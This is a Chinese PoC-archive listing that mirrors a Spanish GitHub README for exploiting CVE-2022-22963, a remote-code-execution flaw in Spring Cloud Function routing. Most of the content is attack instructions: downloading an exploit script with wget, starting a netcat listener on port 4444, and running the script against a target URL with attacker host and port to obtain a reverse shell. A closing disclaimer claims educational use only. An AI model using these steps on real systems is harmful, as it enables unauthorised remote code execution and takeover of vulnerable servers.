POC详情: 49464845d7a7be3b9efcc5cd1375dd5e3746b267

来源
https://github.com/jrbH4CK/CVE-2022-22963
关联漏洞
标题: Spring Framework 代码注入漏洞 (CVE-2022-22963)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞。目前暂无该漏洞信息,请随时关注CNNVD或厂商公告。
介绍
# CVE-2022-22963
En las versiones 3.1.6, 3.2.2 y versiones anteriores de Spring Cloud Function, al utilizar la funcionalidad de enrutamiento es posible que un usuario proporcione un SpEL especialmente diseñado como una expresión de enrutamiento que puede resultar en la ejecución remota de código y el acceso a recursos locales.
## PoC
Descarga el archivo springCloud.sh
```bash
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2022-22963/main/springCloud.sh
```
Cambia los permisos de ejecución
```bash
chmode +x springCloud.sh
```
Inicia nc por el puerto deseado
```bash
nc -nlvp 4444
```

Ejecuta el comando siguiente cambiando los parametros de acuerdo a tus necesidades
```bash
./springCloud.sh url lhost lport
```

NOTA: El uso de este repositorio es responsabilidad de quien lo utiliza y no del autor, solo con fines educativos.
文件快照

 [4.0K]  /data/pocs/49464845d7a7be3b9efcc5cd1375dd5e3746b267
├── [1.0K]  LICENSE
├── [ 843]  README.md
└── [1.1K]  springCloud.sh

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。